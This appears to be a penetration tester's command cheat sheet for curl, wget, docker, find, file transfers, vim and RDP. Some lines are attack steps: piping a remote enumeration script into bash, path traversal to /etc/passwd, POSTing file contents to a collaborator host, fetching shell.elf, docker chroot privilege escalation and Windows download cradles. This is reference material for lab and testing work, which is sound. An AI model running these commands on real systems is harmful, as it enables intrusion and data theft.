$ curl --user "{user}:{creds}" --upload-file=<file> "http://$IP/upload_location"

$ curl http://$IP -o index.html

# fetch the script and pipe it straight into bash
$ curl http://$IP:$PORT:lin(peas\|enum).sh | bash

# proxy request
$ curl --proxy http://127.0.0.1:8080

$ curl --path-as-is http://$IP/../../../../../../etc/passwd

$ cat file.txt | curl -X POST -d @- http://burp.collaborator

wget

# download files with wget
$ wget http://$IP/xxx.sh

# fetch the file to stdout without saving it to disk
$ wget -O - http://$IP:<port>:lin(peas\|enum).sh

# download file and save it somewhere (tmp)
$ wget -O /tmp/shell.elf $IP/shell.elf

docker

# https://blog.ropnop.com/docker-for-pentesters/

$ docker version
$ docker info
$ docker pull registry:5000/alpine
$ docker inspect <container-id>
$ docker network ls
$ docker image ls
$ docker image history <image-name>
$ docker port <container-id>
$ docker rmi <image-name>
$ docker system prune -a
$ docker ps -a
$ docker start <container-id>
$ docker stop <container-id>
$ docker rm <container-id>

$ docker exec -it <container-id> /bin/sh # Get shell inside a container
$ docker run -it -v /:/host/ <image-name> chroot /host/ bash # Privesc technique
$ docker cp <container-id>:/etc/passwd exfil_passwd
$ docker exec <container-id> <command>

Finding and Locating Files

# find with file names
$ find . -name user.txt 

# find and execute
$ find . -name '*.txt' -exec cat "{}" \;

# find files with specific string in it
$ find . -type f -print0 | xargs -0 -e grep -niH -e "string"

# find certain file and exclude files from /proc/ and /sys/ directories
$ find / -name Settings.* 2>/dev/null | grep -v '/proc/' | grep -v '/sys/'

# List various available nmap scripts
$ locate scripts/citrix

File Transfers

SMB Server
# start server
$ impacket-smbserver share . -smb2support -user user -password password
# use server
C:\> net use \\$IP\share /USER:user password
smb> copy \\$IP\share\nc.exe .
HTTP
$ python3 -m http.server 80
$ service apache2 start
$ ngrok http 80
C:\> powershell -c "(new-object System.Net.WebClient).DownloadFile('http://$IP/file.exe','C:\Users\user\Desktop\file.exe')"
C:\> iwr -uri http://$IP/file -Outfile file
C:\> wget http://$IP/file -O file
C:\> curl http://$IP/file -o file
C:\> certutil -urlcache -split -f http://$IP:8000/ok.exe ok.exe  
# ways to download file
$ wget http://$IP/file
$ curl http://$IP/file > file
scp
$ scp file user@$IP:/tmp/
nc
# receiver
$ nc -l -p 1234 > out.file 
# sender
$ nc -w 3 <dest_ip> 1234 < out.file

Decompressing Files

# unzip a zip file
$ unzip file.zip

# extract a .tar file
$ tar -xvf file.tar

# extract a .tar file from output
$ dd if=backup.ab bs=1 skip=24  | python -c 'import sys,zlib;sys.stdout.buffer.write(zlib.decompress(sys.stdin.buffer.read()))' | tar -xvf -

# unzip a *.tar.gz file
$ tar -xzvf file.tar.gz

watch

# monitor: repeat the same command at a fixed interval
# run ls -la on a directory every 1 second
$ watch -n 1 'ls -la'

# repeat executing the command
$ watch <command>
 
# execute the commands in specific intervals
$ watch -n <seconds> <command>

# highlight the differences in each execution ## Thanks copycookie.com 
$ watch -n <seconds> -d <command> 

# exit on changes
$ watch -g <command>

loops

# for loop that prefixes each line of the file with "payload += "
$ for i in $(cat hexdata); do echo "payload += b'$i'"; done

git

# https://github.com/arthaud/git-dumper

$ git log
$ git show <commit-id>

vim

x # cut character
dw # cut word
dd # cut full line
yw # copy word
yy # copy full line
p # paste
:1 # go to line number 1
:q! # quit without saving

Remote Desktop

# Connect to a Windows target using the Remote Desktop Protocol.
$ xfreerdp /v:IP /u:username /p:password /clipboard /dynamic-resolution

$ xfreerdp /d:'<domain_name>' /u:'<username>' /p:'<password>' /v:<host|ip> /size:95% /cert:ignore +clipboard +drive:<adhoc_sharing_folder_name>,</path/to/share/>


remote share via rdp

Fixing SSH Keys

❯ dos2unix id_rsa
dos2unix: converting file id_rsa to Unix format...
❯ echo "" >> id_rsa